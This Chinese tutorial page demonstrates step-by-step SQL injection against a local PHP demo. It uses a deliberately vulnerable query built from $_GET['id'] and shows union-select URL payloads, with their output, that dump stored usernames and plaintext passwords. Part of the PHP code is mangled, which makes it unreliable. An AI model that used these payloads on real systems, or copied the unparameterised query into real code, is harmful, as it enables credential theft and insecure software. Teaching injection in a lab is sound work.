您好,登錄后才能下訂單哦!
這篇文章主要介紹“PHP的SQL注入完整過程”,在日常操作中,相信很多人在PHP的SQL注入完整過程問題上存在疑惑,小編查閱了各式資料,整理出簡單好用的操作方法,希望對大家解答”PHP的SQL注入完整過程”的疑惑有所幫助!接下來,請跟著小編一起來學(xué)習(xí)吧!
SQL注入就是通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。
首先觀察兩個MYSQL數(shù)據(jù)表
用戶記錄表:
REATE TABLE `php_user` (
`id` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default '',
`password` varchar(20) NOT NULL default '',
`userlevel` char(2) NOT NULL default '0',
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
INSERT INTO `php_user` VALUES (1, 'seven', 'seven_pwd', '10');
INSERT INTO `php_user` VALUES (2, 'swons', 'swons_pwd', '');
產(chǎn)品記錄列表:
CREATE TABLE `php_product` (
`id` int(11) NOT NULL auto_increment,
`name` varchar(100) NOT NULL default '',
`price` float NOT NULL default '0',
`img` varchar(200) NOT NULL default '',
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
INSERT INTO `php_product` VALUES (1, 'name_1', 12.2, 'images/name_1.jpg');
INSERT INTO `php_product` VALUES (2, 'name_2', 35.25, 'images/name_2.jpg');
以下文件是show_product.php用于顯示產(chǎn)品列表。SQL注入也是利用此文件的SQL語句漏洞
$conn = mysql_connect("localhost", "root", "root");
if(!$conn){
echo "數(shù)據(jù)庫聯(lián)接錯誤";
exit;
}
if (!mysql_select_db("phpsql")) {
echo "選擇數(shù)據(jù)庫出錯" . mysql_error();
exit;
}
$tempID=$_GET['id'];
if($tempID<=0 tempid="1;" sql="SELECT * FROM php_product WHERE id =$tempID" echo="" result="mysql_query($sql);" if="" .="" while="" row="mysql_fetch_assoc($result))">
觀察此語句:$sql = "SELECT * FROM php_product WHERE id =$tempID";
$tempID是從$_GET得到。我們可以構(gòu)造這個變量的值,從而達(dá)到SQL注入的目的
分別構(gòu)造以下鏈接:
1、 http://localhost/phpsql/index.php?id=1
得到以下輸出
SELECT * FROM php_product WHERE id =1 //當(dāng)前執(zhí)行的SQL語句
//得到ID為1的產(chǎn)品資料列表
ID:1
name:name_1
price:12.2
image:images/name_1.jpg
2、 http://localhost/phpsql/index.php?id=1 or 1=1
得到輸出
SELECT * FROM php_product WHERE id =1 or 1=1 //當(dāng)前執(zhí)行的SQL語句
//一共兩條產(chǎn)品資料列表
ID:1
name:name_1
price:12.2
image:images/name_1.jpg
ID:2
name:name_2
price:35.25
image:images/name_2.jpg
1和2都得到資料列表輸出,證明SQL語句執(zhí)行成功
判斷數(shù)據(jù)表字段數(shù)量
http://localhost/phpsql/index.php?id=1 union select 1,1,1,1
得到輸出
SELECT * FROM php_product WHERE id =1 union select 1,1,1,1 //當(dāng)前執(zhí)行的SQL語句
//一共兩條記錄,注意第二條的記錄為全1,這是union select聯(lián)合查詢的結(jié)果。
ID:1
name:name_1
price:12.2
image:images/name_1.jpg
ID:1
name:1
price:1
image:1
判斷數(shù)據(jù)表字段類型
http://localhost/phpsql/index.php?id=1 union select char(65),char(65),char(65),char(65)
得到輸出
SELECT * FROM php_product WHERE id =1 union select char(65),char(65),char(65),char(65)
ID:1
name:name_1
price:12.2
image:images/name_1.jpg
ID:0
name:A
price:0
image:A
注意第二條記錄,如果后面的值等于A,說明這個字段與union查詢后面構(gòu)造的字段類型相符。此時union后面
為char(65),表示字符串類型。經(jīng)過觀察??梢园l(fā)現(xiàn)name字段和image字段的類型都是字符串類型
大功告成,得到我們想要的東西:
http://localhost/phpsql/index.php?id=10000 union select 1,username,1,password from php_user
得到輸出:
SELECT * FROM php_product WHERE id =10000 union select 1,username,1,password from php_user
//輸出了兩條用戶資料,name為用戶名稱,image為用戶密碼。
ID:1
name:seven
price:1
image:seven_pwd
ID:1
name:swons
price:1
image:swons_pwd
注意URL中的ID=10000是為了不得到產(chǎn)品資料,只得到后面union的查詢結(jié)果。更具實(shí)際情況ID的值有所不同
union的username和password必須放在2和4的位置上。這樣才能和前面的select語句匹配。這是union查詢
語句的特點(diǎn)
備注:
這個簡單的注入方法是更具特定環(huán)境的。實(shí)際中比這復(fù)雜。但是原理是相同的。
到此,關(guān)于“PHP的SQL注入完整過程”的學(xué)習(xí)就結(jié)束了,希望能夠解決大家的疑惑。理論與實(shí)踐的搭配能更好的幫助大家學(xué)習(xí),快去試試吧!若想繼續(xù)學(xué)習(xí)更多相關(guān)知識,請繼續(xù)關(guān)注億速云網(wǎng)站,小編會繼續(xù)努力為大家?guī)砀鄬?shí)用的文章!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。